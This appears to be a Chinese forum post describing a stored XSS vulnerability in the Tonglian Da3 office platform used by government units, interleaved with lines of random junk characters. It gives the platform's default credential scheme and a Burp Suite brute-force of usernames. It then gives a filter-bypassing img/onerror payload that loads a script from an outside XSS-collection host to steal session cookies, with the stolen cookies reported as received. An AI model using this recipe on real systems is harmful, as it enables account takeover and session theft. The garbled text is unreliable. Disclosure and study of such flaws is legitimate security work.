$ D6 m/ ~4 D; f3 ~
3 W: R Q: Q" ^
同联Da3协同办公平台后台通用储存型xss漏洞
/ H' E. v1 Q) ?1 ~6 [
7 }7 ~* t6 Z4 `4 P5 N) s
. k, E, H {7 x% l6 a- }, A/ t
平台简介:% h7 l/ d1 `6 F
9 q( O* ^$ i0 \
+ e3 Z% p# k2 Z: }/ C1 B+ U" k+ y 7 |% f+ z) O( s% @
7 E1 T8 A3 B2 B4 h3 Y1 o- p
7 g! l0 j, O7 `# c; S2 z 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
' C( e( w( W7 S) U$ R同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
, f5 d$ t2 [8 Z: O, `" [同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
) L; s4 S$ B8 \% x) ?4 f
6 S" }5 q3 u4 @9 h
" o0 m( ? [' J4 h
. s! Y C2 d5 P- l7 [) ]+ K( C
4 B$ J2 H: X& ?3 w" n& p
8 C. L2 Y/ B% j2 Y
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
1 V1 o& f. h0 U2 F' s0 R' w, f
& e" X* E+ R. }# a& N
$ m; Z; q/ b w( j
! M2 d# v" k" \6 J
, b+ D/ p; D5 D9 e+ i) N
4 X& v) Z* u6 q8 z http://1.1.1.1:7197/cap-aco/#(案例2-)
& ]* ^. E0 e- K3 b" q S
5 w& M: _5 Y3 A" S ( x( c3 T8 A( q- L! M+ ~3 B
http://www.XXOO.com (案例1-官网网站)" Q5 e* H+ w& C& M: d
4 I6 P' q2 q5 o2 Z" x9 d2 ` 1 I% K" n! ^8 B* E" d( }
漏洞详情:
% S' s# i8 o, C) D
3 O% J; ~. g$ W% f3 u
* {6 \0 s( d6 m; U* s( P$ b 案例一、
4 d' m- q+ p- q+ o- a
8 u) k8 @! Y% {! D& ^6 ?3 U
0 W6 r% I7 }0 d+ J 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
+ y7 W: r0 `' b5 U0 t! m- z
; O( o2 R9 g# e. R, _
3 j4 h; [, s3 O* S' R. |$ V 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
5 X" e& ^4 u9 B9 E7 N
! \5 O3 j" T4 r. m; H4 R: ?
! Y+ Z+ p6 E, D; ]$ e2 ? 3 [1 g) i# p; l: T
2 H$ p5 E1 p9 T
: Y- x7 ]- l: C2 a* x0 W5 Z8 u ! ]& h$ A/ N8 d: |/ c
/ F% W- l9 J$ I0 g: Y8 N
4 O; ~7 N! b; o$ v& R* [( i status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
2 u* p( _4 k% U r, M9 z6 S
% i! _* w" j( u4 X: l- |
0 o( Q! x$ f3 @: v% `/ V# l 8 L3 ?8 |; t8 T
# D2 U* e3 Y9 F& a+ k Y7 H( |! [$ p0 A/ `' p- y, A+ s7 b
& s1 r9 X* P' ?% {+ C1 J( ?
7 o* m9 w( y0 r/ c: R
% v3 y1 @) J2 E8 V% H% Y 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
9 s6 L1 y; z {* B
( l T# O- [& p9 ?8 |1 O
( n$ K( f8 m/ D* g5 ^ % h' X7 Q9 P" h3 m7 A, G [4 A; @
( R3 v- }' O2 F5 H5 p
0 |- `5 R8 @9 l+ ^ M3 [ <img src=x
- K2 ^: a( |. B; g5 Ronerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
$ j2 K, S: o8 O+ E; ^) U
0 d" f+ ^7 F- s/ q8 G9 r( k) S
* x8 g# D& i, h- U1 ]- C
3 ^0 D% u# ^% E) P' @* E: K C v
: B: N. t# C3 G: \6 ^% Z; e
' f, l# o/ M$ A7 C9 b 然后发送,接收cookie如图:
% X( h- l x4 P' b* j) [# V; ?: f
9 R" J8 i- V2 _, Y$ r! I+ t" L ' L$ G p+ J. w( x
6 ~7 v( ]+ ^; ~! M0 b( q2 v7 D% F) t
& X4 A1 v$ \$ T' O! t
( a2 X5 Z( R4 S; I9 f
+ }. p: B/ E$ m6 R$ S2 @, N, n
. `: G, |& o8 A
9 J# S/ X1 L+ m' Q7 A5 s) ?% j& N
3 `) T o1 Q5 c" `: f
5 l7 L$ L6 a5 ]. K 5 Z) G8 J Y2 B7 c
, B( G. ~/ A8 `1 F* M; T/ z
9 R8 j# m6 O4 U4 q9 R9 P8 Y
# M& p* J' s- k2 r 6 {* y* ~% a0 B( _
$ w9 C, [8 M& T% z
/ v, M& ]/ w; C7 H5 Y ' c3 L8 v5 m' R( u5 {/ t7 b
2 c v& [1 p$ ?8 h, m I) ? & K" p8 ^) \5 n5 \8 m1 S* x
3 P3 a$ \ s y5 J
0 v( P3 a% z3 s3 y- t' X2 s
% H; H- z$ K- J: d6 m 案例2、
: o6 H" i+ ?- J" }# J* J
- P' ~* X* F$ R' [8 k6 F
; p) H6 f7 L+ j8 W$ }- s 前面步骤都一样,下面看效果图: * }& I. K' \# K; f7 Q" R5 b( P7 g
/ A$ m9 `0 o" t5 t
4 U" f" B( d+ J0 i4 x+ ]
5 D8 b, x8 o/ A
4 i0 j& z6 r( Y0 b: d
* E* l( B5 @: B7 q* G7 {- w7 S ; Z1 M+ u& L; H" @9 @, [
v; o: b7 b7 q4 g+ B+ O! ] 3 o X4 \# I7 s# c
9 i0 z' i }; L. A% s) V
9 C+ ^" I1 G- Y4 x
3 O0 A7 U) D# q6 w( f' b8 T2 N 5 U s& O! @6 T% n! L
+ Y% m7 B6 B( d) B" b0 h- M
+ I) S, S& L7 ]* `* k, V+ Z 8 @+ V- S/ F: W2 n! H
+ p A! n2 i$ H
5 S' O0 B# d& g* y6 z- a/ X! X0 ^; } f
" G' T+ y0 z7 W4 R0 K# q
9 X6 H& S# T! @- E$ _
9 u& M; x* G R8 h
% e6 i3 @' h# U3 w$ Z, ~5 ?- g, t; M
8 k: _' k, `* F6 V! m; T 4 X8 f$ n' q6 ^9 J% h8 @ {
2 U2 p% j5 ]+ y
0 a0 F( G$ k( ^. U e3 t 4 x: F- r$ j9 P5 J7 r- p8 s
, `, f+ K% N# ^3 F/ O/ g
2 f, C+ p, @( U